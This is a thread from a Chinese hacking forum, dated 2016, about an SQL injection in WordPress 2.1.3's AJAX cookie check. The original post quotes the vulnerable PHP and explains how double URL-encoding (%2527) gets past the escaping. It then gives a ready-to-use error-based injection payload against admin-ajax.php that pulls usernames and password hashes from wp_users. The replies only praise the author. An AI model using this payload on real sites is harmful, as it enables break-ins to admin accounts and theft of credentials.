查看: 35820|回复: 4

[文章] 记录一个WordPress 2.1.3注入

[复制链接]
  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2016-11-3 18:50:38 | 显示全部楼层 |阅读模式
    本帖最后由 Free_小东 于 2016-11-3 18:54 编辑

    ---------------------------------------------------------------------------------------------------------------
    *                                                                                                                                                                 *
    *                                本文来自08内部分享,未经允许,不得转载.                     *
    *                                                                                                                                                                *
    ---------------------------------------------------------------------------------------------------------------


    网站程序用的是 WordPress 2.1.3 ,于是我就在网上搜了漏洞 发现了个 sql注入
    链接:http://www.bitscn.com/network/security/200709/110036.html
    文章里给了个盲注exp 不好使 没几次暴出来的密码都使不一样 囧.
    决定还是自己动手吧 然后看了下文章里的分析

    [PHP] 纯文本查看 复制代码
    function check_ajax_referer() {
    $cookie = explode('; ', urldecode(empty($_POST['cookie']) ?
    $_GET['cookie'] : $_POST['cookie'])); // AJAX scripts must pass
    cookie=document.cookie
    foreach ( $cookie as $tasty ) {
    if ( false !== strpos($tasty, USER_COOKIE) )
    $user = substr(strstr($tasty, '='), 1);
    if ( false !== strpos($tasty, PASS_COOKIE) )
    $pass = substr(strstr($tasty, '='), 1);
    }
    if ( !wp_login( $user, $pass, true ) )
    die('-1')





    我们 通过 strpos($tasty, USER_COOKIE) 和 strpos($tasty, PASS_COOKIE) 的验证就可以了 USER_COOKIE和PASS_COOKIE都是常量
    可以看到上图get_option(‘siteurl’)是从数字库中读网站地址 在加一次md5值就可以通过验证了



    知道这个后我们来构造下

    因为用了urldecode(),我们用%2527来绕过wp做的转义限制

    位置代码:
    [PHP] 纯文本查看 复制代码
      if ( !$user = $wpdb->get_row("SELECT * FROM $wpdb->users WHERE user_login = '$user_login'") )
                return false;


    exp:

    [AppleScript] 纯文本查看 复制代码
        /wp-admin/admin-ajax.php
        cookie=wordpressuser_md5(网站url地址)=aa%2527 and(select 1 from(select count(*),concat((select concat(user_login,0x5e,user_pass,0x5e) from wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)– n; wordpresspass_md5(网站url地址)=dddddd



    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2016-11-3 19:00:29 | 显示全部楼层
    666,小东果然厉害

    点评

    内部分享的  详情 回复 发表于 2016-11-3 19:17
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2019-12-19 16:52
  • 签到天数: 157 天

    [LV.7]常住居民III

    发表于 2016-11-3 19:04:16 来自手机 | 显示全部楼层
    回复看看大牛作品
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

     楼主| 发表于 2016-11-3 19:17:43 | 显示全部楼层

    RE: 记录一个WordPress 2.1.3注入

    wuyan 发表于 2016-11-3 19:00
    666,小东果然厉害

    内部分享的  
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2017-3-9 08:40
  • 签到天数: 108 天

    [LV.6]常住居民II

    发表于 2016-11-6 22:35:28 | 显示全部楼层
    东哥  我当你小弟可好 QAQ
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-21 19:04 , Processed in 0.031118 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部